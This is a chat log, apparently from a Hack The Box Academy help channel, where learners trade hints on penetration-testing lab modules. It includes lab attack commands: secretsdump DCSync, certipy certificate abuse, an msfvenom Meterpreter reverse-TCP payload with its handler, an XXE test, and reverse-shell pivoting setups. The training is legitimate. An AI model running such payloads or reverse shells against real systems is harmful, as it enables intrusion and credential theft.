Oh my bad yeah I know what you mean then I also had issues with that one. I restarted the machine and just used slinky and then cleaned it, and then I was able to get it using drop-sc.

harsh gorge
#

wait got it to work

left lintel
#

Im not sure why it didn't give it to me until I restarted im not sure if you have to clean it for it to give you the next hash or what

#

oh nice

harsh gorge
#

Relaying is cool as hell dude

ruby jetty
#

hey guys if someone could lend me some hints on assembly module assessment. i was able to write the code to XOR each 8 bytes pushed into the stack memory. i looped trough it and got several hex values. what type of answer does htb want? a flag like format?

rich obsidian
ruby jetty
#

nvm got it finally

silent kindle
brave field
wicked bramble
#

openvpn

cloud mural
#

And it didn't respond to it LoL

#

Then OpenVPN worked

#

Thank you for your response anyways XD

#

I have a doubt, where can I find the root flag?

cloud urchin
#

the module question should say

#

If you're doing boxes, you'll need to follow the instructions in #welcome to gain access to #boxes.

small scroll
#

Can someone give me a hint for password stuffing section of the Password attacks module? I am rather stuck.
Here is the description:
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01) with user "sam" and password "B@tm@n2022!"

I first looked for any files which might contain the passwords such as in /etc/mysql/ (there were none) and tried to login to the mysql server with sam's credentials and default credentials. Unfortunately, this also didn't work.

eager spindle
#

@lament oak Sorry to bother you, I have been working on Credential Hunting in Network Shares for a long time and I haven't solved the first problem. If you have solved it, could you share your notes or tell me how to do it?

lament oak
#

No idea

#

I'm stuck too

keen grove
#

Hey guys! Question to people, who has passed Attacking Enterprise Networks blindly. How did you find password in the logs on monitoring.inlanefreight.local host? What was you thought process?

opal shuttle
proven plinth
coarse tide
#

Has anyone completed a cobblestone machine ?

coarse tide
opal shuttle
#

its mssql right?

stable flume
#

hol up im missing somethin

#

nvm i got it

#

thx

wooden seal
#

Ligolo ng listener : listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
trying to run eternal blue. but cant get rev shell coz of lhost and lport misconfig
what should i set lhost & lport as?

  1. 127.0.0.1 & 10000
  2. 0.0.0.0 & 10000
  3. Internal-ip & 30000
  4. something else
vague cedar
#

guys in active direcroty attacks module's DCSync part, I'm running impacket's secretdump.py but there's no output

naive sage
vague cedar
#

on this command-
secretsdump.py -outputfile inlanefreight_hashes -just-dc 'INLANEFREIGHT.LOCAL/adunn@10.129.17.183' -debug
I'm getting this-
Password:
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up...

opal shuttle
vague cedar
#

yea

opal shuttle
#

have you modified /etc/hosts

vague cedar
#

ooh, no. ill do that

naive sage
#

There you go.

vague cedar
#

thanks :)

naive sage
vague cedar
#

still nothing :(

opal shuttle
#

is doamin.tld is your domain controller?

#

i think try putting this "INLANEFREIGHT.LOCAL <its ip>

rich hornet
#

"One of the easiest things we can do when initially poking around on a Windows host is to get a listing of the directory we are currently working in. We do that with the dir command."

Am I dumb, or why doesn’t it work?

brave field
# wooden seal Ligolo ng listener : `listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --t...

IP and port of the machine where the listener is created. IP of --addr 0.0.0.0:30000 and port should be 30000. Hope that's clear.

Read this: https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

Medium

Let’s talk about pivoting in the context of ethical hacking. In the simplest of terms, pivoting entails moving deeper into a network that…

acoustic owl
rich hornet
acoustic owl
rich hornet
rich hornet
#

still ty for the help

unreal ridge
vague cedar
last musk
#

Hi am getting ths error on the Attacking Enterprise Networks Lateral Movement module channel 7: open failed: connect failed: Temporary failure in name resolution
<SNIP>
channel 3: open failed: connect failed: Temporary failure in name resolution
channel 4: open failed: connect failed: Temporary failure in name resolution

opal shuttle
#

Tools like ligolo-ng will make your life a bit easier

unreal ridge
gray yacht
wooden seal
gray yacht
#

Are you running the exploit with metasploit or is it a EB exploit from GitHub?

wooden seal
#

is there a way to increase timeout? i am getting this
tried set wfsdelay doesnt helped

gray yacht
# wooden seal yup

Yeah as long as you use the correct payload and configure things correctly.

wooden seal
gray yacht
#

Which module/section are you working on?

wooden seal
#

well its not a module i am doing pro labs

gray yacht
opal shuttle
prisma bison
#

hallo im new member, how to create vps with digital ocean?? thank you

grizzled schooner
#

Just thought it was worth posting - currently can't complete the Internal Password Spraying - Linux module. Restarted the machine 4 times now, every time I ssh into the host the lab crashes

opal shuttle
prisma bison
gray yacht
naive sage
wooden seal
untold orbit
#

Hi I have a question regarding use of Kali VM with VPN for academy. When I use my own Kali VM with VPN, I am not able to enumerate properly. The results are different to when I am using Pawnbox.
For example I am doing IPMI in Footprinting module.
This is what I get from my own VM.

naive sage
#

what exactly you are trying to do?

untold orbit
#

But when using Pwbox.. I can get the answer.

#

Can you please help me fix this issue.

wooden seal
naive sage
#

I would suggest changing the region.

untold orbit
naive sage
untold orbit
naive sage
untold orbit
#

Thanks mate.. It is udp protocol. That might be the reason it is dropping packets.

brave field
brave field
#

leave me a message and I'll get back to you soon as I am busy elsewhere right now

bold birch
#

I am trying to do ctf and i am connected to VPN but its showing slow speed and i cant ping the target, why ?

#

I am using openvpn btw

bold birch
bold birch
#

Please help me i havent done CTF for 2 days

inland pecan
#

Hello. I just joined and I haven't done a CTF. Where should I start?

bold birch
#

Idk

#

Figure out yourself

#

Thats how i do it

bold birch
soft moon
inland pecan
late junco
#

i need help with these questions from DNS section of Footprinting module

brave field
devout lily
#

Getting started - Alternative method
Hi everyone, can someone explain me how to solve this errors? I have already set the necessary options to run this nibbleblog exploit, i dont know why

#

i changed it, but it still doesn't work

devout lily
#

VPN config?

#

or exploit config?

#

LHOST set at the IP for tun0 interface, the port set at 4445

loud briar
#

What rule

devout lily
#

Again

#

LMAO

#

Sorry im a newbie

#

bro needs to change his math vote

loud briar
#

?

serene leaf
#

Can someone give me a brief description of what topics is being discuss here. Ps Thanks

inland pecan
#

@bold birch Yes

serene leaf
#

Currently

#

Thanks

last musk
#

Its on Attacking Enterprise Networks Lateral Movement

gray yacht
#

This is from AEN and is over Tier 0. If you are having issues, I recommend asking if anyone is willing to go to DMs to discuss AEN content.

small scroll
gray yacht
gray yacht
grizzled schooner
#

Anyone else on US East having VPN problems? My VPN keeps restarting on me please @ with replies

errant wing
#

Is there any channel for Sherlocks questions ?

#

"No Access" 🙁

naive sage
errant wing
#

Thanks a lot !

wraith ruin
#

I need some help in shells and payload module, the final machine in that module 'the live engagement'. In that it need to be connected through a RDP but its too slow. is there any way to make it without rdp

eternal saffron
#

pentest in a nutshell

#

section :windows initial

#

i am trying to connect to smb through crackmapexec

#

but when i try to copy the file

#

i got error reading devs file ; netbios connection with host timeout

#

i got it multiple times

gray yacht
wraith ruin
eager spindle
#

Can anyone help me with the Credential Hunting in Network Shares part? Please DM me, thanks.

rich obsidian
fallen bough
#

hellooooo guyssssss

soft moon
#

nevermind I got it

#

thats where I am currently stuck on that module too

winter shard
soft moon
#

thats a yikes moment

winter shard
eager spindle
soft moon
#

yeah expect far behind only completed about 65% and only understand ~30 to 40% once I go for a second round with detailed notes I think Id be ready for the ctps

eager spindle
eager spindle
#

Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -PatternShould I run this code? I've reviewed it three or four times, but it always fails with insufficient permissions. When I use it in a place with permissions, the output is incredibly long. Is it because I haven't specified the pattern correctly?

winter shard
eager spindle
cloud urchin
#

@winter shard Please take care not to post content from modules above tier 0

lament oak
#

Hey Guys in pass the ticket from windows section from password attacks I don't see john's ntlm or his tgt nothing from dumps. Any hint on what I'm missing

steady dust
#

Has anyone completed the module LLM Output Attacks? I need some hints for the skilss assessment. 🙂

topaz willow
#

Hey someone have CRTA cert? Is it relevant in the field or not really I’m looking it up

digital pendant
#

silly one, how would you go about downloading the tools inside C:\tools of the AD Enumeration module? as its 1.25GB which is currently at 150byes / s ... yes bytes. it stopped estimating the time to download at around 23h

safe star
#

Get the tools from the source

digital pendant
#

I know I should compile them myself, I want to take the tools as they currently exist and test against the skills assessment...

safe star
#

Are you using smb?

digital pendant
#

was transferring over SMB to begin with but switching to SMB

#

was transferring over RDP*

safe star
#

Yeah that probably why plus the vpn slowness

plucky sky
#

Hey Everyone 👋

rich obsidian
#

I just finished the hard lab for the enumeration module. I have to say I am very impressed with how they make those labs feel.

storm elk
storm elk
#

If you did follow the instructions, you would be identified now 🙂

plucky sky
storm elk
#

Didn’t follow and execute the three steps from #welcome

plucky sky
#

Oh OK but Tomorrow cuz I just turned off my pc and all credentials in it 👍

#

Bye 👋

storm elk
#

No worries, have a great night

rich obsidian
#

This is going to sound however it sounds, I am going for the cpts and just finished footprinting. The next two modules are information gathering and vulnerability assessment. I'm going to be real, often when a course includes information gathering it is a whole lot of theory and memorization instead of hands on doing because of the nature of open source intelligence. As far as vuln assessment goes, I know it is important for the "job" to meet those legal checkboxes for a company, but it isn't exactly enticing to do or read. Long story short, will it hurt me going forward if I skip these two modules in the pentest pathway then come back to them later to finish them as required for the cert? Or are the exercises offered in both modules an interesting and good take on the subject and worth doing immediately?

gray yacht
# wraith ruin Can you explain it in detail pls.

This isn't really the place for me to explain this in detail, as it technically isn't a requirement for that Skills Assessment and the information I provide may end up adding another element to something you are already learning. I would finish it with the provided content, i.e., the attack box you RDP into and then if you are doing the CPTS path, circle back to this after the Pivoting module and use what you learn in that module to use the RDP host as a pivot host. By that point you should also understand pivoting better, so I would also recommend some self-learning and add ligolo to it for pivoting.

fathom pendant
fathom pendant
#

Don't let its name fool you

fathom pendant
#

Its what I did if I recall

narrow rover
#

Hello smart minds, I am new here ...
Glad to join you all

Please any insight or roadmap for a beginner

I will appreciate

compact patrolBOT
storm elk
#

@narrow rover 👆

lament oak
#

Restarting it and then tried again it worked

#

But thanks for answering

rich obsidian
#

but beyond that, you may have to clue me in on why its important.

narrow rover
fathom pendant
rustic sage
#

Yooo

fathom pendant
rustic sage
#

How to open my genral

fathom pendant
reef axle
#

Hello All, Im super stuck at Web Attacks -> Local File disclosure, where Im just trying to verify the vulnerability exists or not,

<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>

but in repsonse im recieving @company;

#

where Im wrong

fathom pendant
reef axle
#

oh yes

#

got it

fathom pendant
#

@sick stump don't leak passwords

sick stump
fathom pendant
#

No you didnt

#

Spoiler tag does nothing

sick stump
#

oh wait im so dumb

fathom pendant
#

But anyway

#

Each service contains a unique user

sick stump
fathom pendant
#

You will not reuse the same credentials on a service

mellow garnet
#

wsl --install -d Ubuntu
Downloading: Ubuntu
Installing: Ubuntu
WSL2 is not supported with your current machine configuration.
Please enable the "Virtual Machine Platform" optional component and ensure virtualization is enabled in the BIOS.
Enable "Virtual Machine Platform" by running: wsl.exe --install --no-distribution
For information please visit https://aka.ms/enablevirtualization
Error code: Wsl/InstallDistro/Service/RegisterDistro/CreateVm/HCS/HCS_E_HYPERV_NOT_INSTALLED

Hi guys can anyone help with this error, nested VM is enabled on the virtual box then also I am not able to install ubuntu why is it so?

fathom pendant
fathom pendant
sick stump
fathom pendant
mellow garnet
unreal berry
#

Meterpreter Tunneling & Port Forwarding on the module Pivoting, Tunneling, and Port Forwarding:

Solution to msfvenom segmentation fault while trying to run backupjob.

ubuntu@WEB01:~$ ./backupjob 
Segmentation fault (core dumped)

First -
Try to use stageless meterpreter payload -

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob

Second -
Specify the payload in the payload options

set payload linux/x64/meterpreter_reverse_tcp

It should look like this -

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob

then after copying to the Pivothost

msfconsole -x "use exploit/multi/handler; set payload linux/x64/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 9091; exploit"

BINGO!

fathom pendant
sick stump
mellow garnet
fathom pendant
#

Also it says "hyperv not installed" that'd be on your vm

reef axle
fathom pendant
reef axle
#

although i solved it

mellow garnet
# fathom pendant Also it says "hyperv not installed" that'd be on your vm

I use the following commands to do that but still the same error

dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V-All /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

fathom pendant
fathom pendant
last musk
#

How do you sync time on HTB pwn box I need it for a module

mellow garnet
fathom pendant
sick stump
#

@fathom pendant Small question, is there a way i can interact with an smb server using nxc the same way i can interact with it using smbclient ?

last musk
sick stump
#

wdh why did it do that

#

oops

fathom pendant
fathom pendant
#

Look into the nxc docs

sick stump
#

i know it can list shares but thats about it

fathom pendant
#

It can do more

sick stump
#

ok ima expirement a bit thanks dude 🙏

fathom pendant
last musk
#

Im stuck on the kerberos auth I need to get the time to sync is it okay if I DM you @fathom pendant

fathom pendant
#

It also helps to know the module and section youre working on

last musk
#

i got a account but I need to do spns for kerberoasting

fathom pendant
#

Ah, I did that module blind

#

ctrl-f in this channel and search for the keywords like "faketime" or "ntpdate"

last musk
last musk
#

and most of the people doing it have used there own VM

fathom pendant
#

¯_(ツ)_/¯

last musk
#

Figured it out by guessing 🙂

fathom pendant
#

Well i definitely dont recommend guessing lol

digital pendant
pale wigeon
#

hello.
Currently doing Skills Assessment - Password Attacks and stack on J server, found some admin pass, searched through shares on F and found old pass of h... and files for pass manager. But nothing of that I found can decrypt the files.
Any hints?

grim gust
#

https://academy.hackthebox.com/module/236/section/2540
Does anyone know how to fix
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host

I can ping the ip-adress and lab-LAB-DC-CA

└─$ certipy req -u '*******' -p '**********' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *******
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host
[!] Use -debug to print a stacktrace
[-] Failed to get dynamic TCP endpoint for 91AE6020-9E3C-11CF-8D7C-00AA00C091BE
[-] Got error: Failed to get DCE RPC connection
[-] Use -debug to print a stacktrace
┌──(kali㉿kali)-[~]
└─$ ping lab-LAB-DC-CA 
PING lab.local (10.129.44.56) 56(84) bytes of data.
64 bytes from lab.local (10.129.44.56): icmp_seq=1 ttl=127 time=882 ms
64 bytes from lab.local (10.129.44.56): icmp_seq=2 ttl=127 time=14.2 ms
^C
--- lab.local ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 14.219/448.146/882.074/433.927 ms
gray yacht
#

This isn't the correct channel. If this is career related it would be more appropriate in #careers-and-certs

gray yacht
grim gust
#
certipy req -u '****l' -p '****' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *** -debug 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

usage: certipy [-v] [-h] [-debug] {account,auth,ca,cert,find,parse,forge,relay,req,shadow,template} ...
certipy: error: unrecognized arguments: -debug

That is sily -debug unrecognized ???

#

Sorry after 6 times

[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 64
[*] Successfully requested certificate
gray yacht
fathom pendant
fathom pendant
#

Iirc you may be able to run hashid -m filename to check

pale wigeon
fathom pendant
crystal cove
#

It feels like a dumb question but.. "Windows Attacks & Defense - Kerberoasting", how do I access the Kali image that has the passwords.txt file for kerborasting the ticket's hash ? I am connected through my Pwnbox, generated the WS01, but thats a W11 host. Trying to ssh on the IPs of the previous documentation (Windows Attacks & Defense - Overview) but it timesout

#

also nmaped the network of the W11 host but its the only host there

#

Thx in advance for all help

#

(accessing the Kali machine is not part of the flag, its part of the doc, but the IPs mentionned dont work)

fathom pendant
sick stump
#

Hey guys in the Password Attacks module, https://academy.hackthebox.com/module/147/section/1328 for the question "Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)"

i need a nudge, i tried to use the default credentials for the mysql service and it just kept saying the password is incorrect

I googled a bit and saw a reccomendation to check if the server is running in the first place, and it looks like thats the case but its still not working

any help

crystal cove
fathom pendant
fathom pendant
sick stump
plain charm
sick stump
fathom pendant
plain charm
#

There is a GitHub repo i guess that contains some default credentials for the service. Afaik

sick stump
fathom pendant
fathom pendant
sick stump
#

Oh well thanks peeps ill try this

sick stump
#

bro whoever this guy is, your the goat man 🐐

fathom pendant
sick stump
fathom pendant
#

You absolutely can log in

#

That person just couldn't

sick stump
#

Your joking LOL

#

ALL I HAD TO DO WAS THAT

fathom pendant
#

Or put the password immediately after, no spaces

sick stump
#

omg

fathom pendant
#

If you read the error

sick stump
#

Oh well Another day of learning ChimkenRoll

sick stump
#

Thanks for the help marcie 🙏

subtle mist
#

hello, I m stuck on password attack skill assessment for days, I ssh to DMZ with provided credentials, after searching with limited privilege i found a user credentials for FILE01, also in logs I saw privileged user has been added to DMZ but cant find its credentials or hash anywhere I tried other privilege escalation techniques like cronjobs also nothing. thought may be there s no need to escalate privileges on DMZ and transferd chizel to it and started proxychain to use it as pivot after runing nmap scan tried loging into FILE01 with credentials I found on DMZ also didnt work,. any help or hints

fathom pendant
unkempt crown
#

Hey Everyone, currently i'm trying to connect to a target machine from my Workstation through ssh , i typed the command ssh hostname@[IP adress] and it still gives me Name or Service are not know , i m not sure hownto fix this

fathom pendant
cosmic wadi
#

Guys

fathom pendant
#

Also its username@ip not hostname

unkempt crown
#

Ok thanks alot , i got it

fathom pendant
#

@cosmic wadi

  1. That's illegal
  2. That's not what this server is about (#rules)
cosmic wadi
#

Ok I guess not sorry

fathom pendant
#

That's still illegal, and this isnt a hacker for hire server

cosmic wadi
#

Alright

fathom pendant
subtle mist
# fathom pendant The user you have for file01 can be used to find other files

I tried logging into it with DMZ as pivot with chizel but couldnt i get an error (transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED) I tried using my vm also same output and used the technic described in cheat sheet (ssh -D 9050 user@<DMZ01>) also didnt work, do i need to escalate my priviliges on DMZ before pivoting?

fathom pendant
#

I personally used ligolo for pivoting

subtle mist
#

I will look into it I still havent gone through the pivoting module but I ll figure it out thank you very much for the help I got into so many rabbit holes and I m still in beginning of the assessment

rotund rose
#

Hi, I'm currently in the Command injection module, testing obfuscation by reversing strings, if I input $(rev<<<'imaohw') i get a listening on [any] 9001 ... response, tried googling and asking gpt, nothing fruitful

heavy torrent
#

Hello folks

#

I am on the Pivoting Module - Remote/Reverse Port Forwarding with SSH

#

I know is not asked, but trying to get a proper reverse shell from Windows, following the instructions.

#

Is that possible? No RDP credentials are provided. But when I scan via proxychains, all ports are closed on Windows

earnest raven
#

Hi, I need a nudge on the kerberoasting skills assessment. I'm stuck on the second question. So I got a username and a hash but I can't crack it. Is this hash uncrackable or am I doing something wrong? I need the creds to further enumerate the domain.

teal arrow
#

This might sound rhetorical but after having done the SQL Injection fundamentals, I found that SQLMap kind of overwrites a lot of what I did in that lesson. Are there scenarios in the boxes were you would manually enter the injections instead of just using SQLMap?

silent kindle
cloud urchin
heavy torrent
barren apex
#
# Module: Attacking Common Services
## Section: Attacking DNS
#### Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

I looked into the hint and used the tool as suggested, but I'm not getting any results, is there something wrong with the machine or am I missing something?
vagrant light
#

any hint? Assess further the web application and submit the name of the database user? - Intro to C2 Operations with Sliver

gray field
#

Module: Android Application Static Analysis

Section: Deobfuscating Code

Question: I'm following the section but paranoid-deobfuscate module is not working. The output is like this.

(.venv) PS F:\Tool\paranoid-deobfuscator-2.0.1> python -m paranoid_deobfuscator F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp
Traceback (most recent call last):
File "<frozen runpy>", line 198, in run_module_as_main
File "<frozen runpy>", line 88, in run_code
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator_main
.py", line 240, in <module>
main(args)
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator_main
.py", line 126, in main
deobfuscated = deobfuscator.deobfuscate_strings(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\paranoid.py", line 130, in deobfuscate_strings
DeobfuscatorHelper_getString(string_id, chunks)
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\deobfuscator.py", line 67, in DeobfuscatorHelper_getString
state = DeobfuscatorHelper_getCharAt(index, chunks, state)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\deobfuscator.py", line 81, in DeobfuscatorHelper_getCharAt
chunk = chunks[int(char_index / MAX_CHUNK_LENGTH)]
~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
IndexError: list index out of range

I stuck with this problems 2 days...

safe star
#

Hint is in the question

patent whale
#

Hey hey, I have trouble with the logrotate privesc module. I successfully trigger the rotation, using the correct log file, but the payload does not execute at all. Tested with just having it touch a file in /tmp, no success. Any help appreciated.

#

This is the output of the exploit.

jade glen
#

is anyone alive?

lament lance
#

yo hack ybk

cloud urchin
#

Hi all, welcome. please read the #rules and follow the instructions in #welcome to gain access to most of the server, like #general. This channel is for the modules on Academy.

gray field
crystal cove
cloud urchin
#

you're supposed to target the DC

vague cedar
#

guys whenever im running bloodhound it is opening neo4j browser thing

#

not bloodhound

cloud urchin
#

Is your bloodhound binary a browser? neo4j is just a database engine that you can access via a webapp, bloodhound is a totally separate app that accesses that database

vague cedar
#

I started neo4j using "neo4j console" setup credentials, then in terminal entered bloodhound, but instead of bloodhound's login page it is opening the neo4j browser

cloud urchin
#

yeah so check the binary make sure it's actually bh. maybe reinstall it.

vague cedar
cloud urchin
#

k

crystal cove
winged silo
#

Hello, I am currently working on the “Using CrackMapExec Skill Assessment.” First, I used --rid-brute to obtain the username list. Then, I planned to use proxychains4 -q nxc ldap 172.16.15.3 -u ./Desktop/testuser -p '' --asreproast aspout, but it keeps showing Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN (Client not found in Kerberos database). I don’t know how to resolve this issue.

patent whale
#

Good morning! Could anyone help me pls. with the Logrotate Linux Privesc? I crafted the payload, uploaded and compiled the exploit, forced the rotation, the exploit did its job, but hasn't ran the payload / nor printed "Done!" as it should when it runs the payload.

brave field
winged silo
autumn pilot
#

The best approach is to look for a machine instead of a module, as the machine based view will give you references to modules which will help you tackle it

#

The other way around will not make sense, e.g., module -> machine, if you don't understand the above ^

dense lava
#

I'm haivng some issues in the Advanced NTLM Relay Attacks Targeting Kerberos part of the NTLM Relay attacks module, for the second question (RBCD) I have enabled WebDAV on the target, set Responder with HTTP and SMB disabled, run both ntlmrelayx and responder, coerced SQL01$, and then it tells me that the user plaintext$ doesn't exist in LDAP. I have restarted the lab multiple times and last time, SQL01 didn't even even start/domain join/wasnt reachable. Am I doing something wrong?

autumn pilot
#

How did you end up with the plaintext$ user in the environment?

dense lava
autumn pilot
#

Try to figure out if it is a user or a machine account, and if its the latter

dense lava
#

the $ at the end indicates machine account

autumn pilot
#

If that object doesn't exist in the AD environment, then this is a clear hint that you missed a step

dense lava
#

there are no other steps in the module

autumn pilot
#

Actually, there are

dense lava
#

i see it now, i dropped it on a lab restart, ty

vagrant shuttle
#

For the Pass the Certificate section in Password Attacks, is anyone else getting the following error when trying to get the TGT?

granite osprey
#

Hi all,
I’m doing the File Uploads Attacks skill assessment. I found where the uploaded files go, and the file extension that can run code.
I tried putting code inside an image, and even hiding it in the image’s metadata, but it keeps getting blocked. I guess the site is really strict about only allowing “real” images. Any hints on how to make it accept my file?
Thanks!

storm elk
last musk
#

Can you get the CPTS exam free with student sub?

storm elk
#

You do get access to the path with the student subscription, but the exam has to be bought separately

last musk
#

I have done the path how much will the exam cost

storm elk
full echo
wooden seal
#

I am using this command for chisel : ./chisel client <kali-ip>:4445 R:4444:<Internal-ip-of-target>:445
so when running an exploit what should i set lhost,rhost & lport,rport

icy bison
#

hey guys I was stucked in password attack module. In the section of "introduction to password cracking" their was a question "what was the sha1 hash for Academy#2025?" . I got the hash for it by entering the command "echo -n Academy#2025 | sha1sum " in the pwn machine of the htb . but the hash submited by it was shown incorrect

wooden seal
icy bison
wooden seal
#

getting no reponse in prolabs
some guy had same issue in posted a message on that post he withdrawed his message

icy bison
#

anyone know the answer for my qn

autumn pilot
#

Have you tried using the provided workstation to obtain the answer?

storm badger
#

Hi

summer lava
#

Hi @storm badger

icy bison
autumn pilot
#

Are you sure you are copying the value correctly, and have you checked whether the command you run is correct

gray yacht
opal shuttle
#

If u still need help

astral coyote
#

Hi where can I Ask for help

brave field
astral coyote
#

I‘m Stuck at the USING WEB PROXIES - BURP INTRUDER

#

I Need to Fuzz for the .html file under the /admin Directory

#

But is there any Chance I Can geht the .html file without waiting for Hours to finish the common.txt List in burp suite

grizzled schooner
#

Internal Password Spraying - with Linux

Can I get a nudge on getting the username? I've been running this password spray for about an hour and a half lol

astral coyote
plain charm
#

After finding the correct page, you can visit the page in browser, there should be your flag present

astral coyote
#

Ok thx I got it now 🤩

gray field
# full echo 1. Did you install the tool as instructed? 2. Did you decompile the app?

Yes. I use 2.0.1 module and decompile the app with apktool. I use
apktool d myapp
and I use python venv module and run python script 'python -m paranoid_deobfuscator F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp.
F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp is directory that I decompile with apktool.... I don't know what I did wrong..

astral coyote
#

I got antother question to ZAP Scanner, „Once you find the High-Level vulnerability“ but when I run the zap Spider I don‘t get any high Levels only low or Medium

astral coyote
#

Got it by myself now :)

thin fractal
#

guys im stuck on Credential Hunting in Network Shares challenge more than one day maybe 2 days i want help please i did everything and i couldn't find the passwords, any help please

full echo
shut delta
#

Hi, I’m stuck on the WP skill assessment. I can’t find any trace of WordPress on the site.
Wpscan doesn’t work and Gobuster can’t find any WP directories. I’ve also manually looked for them.
Can anyone give me a hint?

gray yacht
brave field
gray field
#

My Apktool is "Apktool 2.12.0 - a tool for reengineering Android apk files
with smali 3.0.9 and baksmali 3.0.9".

I'll do what you say. Thank you.

tropic canyon
#

Guys have a question, when I purchase a module, do I have to complete it on time, or will I retain ownership of the module indefinitely even if I do not complete it?

grizzled schooner
ruby jetty
#

Hello im having an issue with SOC Path. Currently doing the Windows Event Logs module. Right on the first section after i instantiate the VM and spawn the target. It requires a login with xfreerdp (which i have done gazillion times in this life). I get this error trhown back after copying and pasting the command from the page and modifying the ip in order to connect. Btw the login was successful the first time, booted up a windows VM and after couple of seconds it shutdown and now throws this error

[10:45:37:165] [10651:10652] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]```
terse bloom
ruby jetty
#

tired today. missed that one out. anyways the target machine is now spawning for 6m straight so ill have to sit out and wait until it decides to work

deep pier
#

Just checking all the rooms in Linux fundamentals is free right?

brave field
timber bloom
#

i am doing Attacking Enterprise Networks and everytime i try to open the ip in my firefox the ssh connection breakdown and show root@dmz01:~# channel 5: open failed: connect failed: Temporary failure in name resolution

#

please someone tell me how to fix as i have wasted 2 hrs plus and still stuck here

atomic shoal
#

Hi guys i have a problem Fileupload whitlist filter i get the valid extension then after i send it and try to excute it response with 404 and on of them give me 403

lean bronze
atomic shoal
grizzled schooner
narrow merlin
#

Anyone done Android Penetration Testing Automation - Medusa - Bypassing Security Mechanisms? I'm stuck on Use the methods described in this section to retrieve any URIs used in the app. - not sure if I understand this question

peak topaz
#

Hey yall theres this site that i forgot that was basically a pw crackign site. It had hella passwords and usually ive heard people just upload their hashes there before they actually use hashcat. I was wondering what it was bc its been mentioned before in the modules. If anybody knows lmk pls!

fathom pendant
#

your logic seems off here

#

also you shouldn't change any of the external conditions of the loop

#

also Intro to bash scripting is a t1 module

fathom pendant
#

i believe it's referenced in AD enum module or something

#

also: using echo without -n may be more useful

#

@silent isle ^^^ read above; the section gives you ways to do your count and such; don't stray far from what's shown

#

also conditions are in double brackets, not single [[ put condition like this ]]

peak topaz
#

yes thank you

pallid pilot
#

Hello, i need some help with the HTTPs/TLS Attacks Skills assessment, can somebody help me?

junior flicker
#

Hey Everyone, working on the Password Attacks module Attacking Windows Credential Manager exercise. I can switch to mcharles and found the Administrator password and can open CMD as Admin, but I don't see mimikatz or any of the other tools from the section. What am I missing?

hollow kernel
#

Hi have a problem with ntlmrelayx it doesnt work ni my machine

earnest raven
#

Hey guys, I'm stuck on the the last question of the attacking kerberose skills assesment module. Could someone DM? Thanks.

crystal cove
#

hi chat, trying my luck again to solve this technical issue

module: Windows Attacks & Defense
chapter: Kerberoasting
issue: SSH to Kali gives timeout
What i've done: connected to the W11 machine through the Pwnbox, got TGS ticket with Rubeus han the description says:

We then need to move the extracted file with the tickets to the Kali Linux VM for cracking
how i tried to connect to the kali machine:

  • ssh kali@172.16.18.20 from the W11 host (like written on the previous chapter "Overview")
  • ssh kali@172.16.18.20 from the Pwnbox
  • ssh kali@kali (yes i'm desperate)
  • nmap the Pwnbox network to see if there is a kali host somewhere (very desperate)
  • extract the hash from the spn.txt file to run it on crackstation and sorts (not the correct format)

first question of this chapter is "Connect to the target and perform a Kerberoasting attack. What is the password for the svc-iam user?" So i need to be able to run the dictionnary attack on the extracted spn.txt file to be able to answer

#

PS: also tried rotating machines

cloud urchin
#

You either use the ws01 or your own kali/pwnbox as the attacker boxes

#

the 172. is an internal subnet and you won't be able to reach it from a VM unless you pivot through the pivot host

crystal cove
#

but the pwnbox does not have the passwords.txt file required in the chall

#

mentionned in the text*

cloud urchin
#

it may be in rockyou, or just transfer the file over if you need

#

once you have the hash you can literally just copy it and paste it into the machine you're running hashcat on with the wordlist

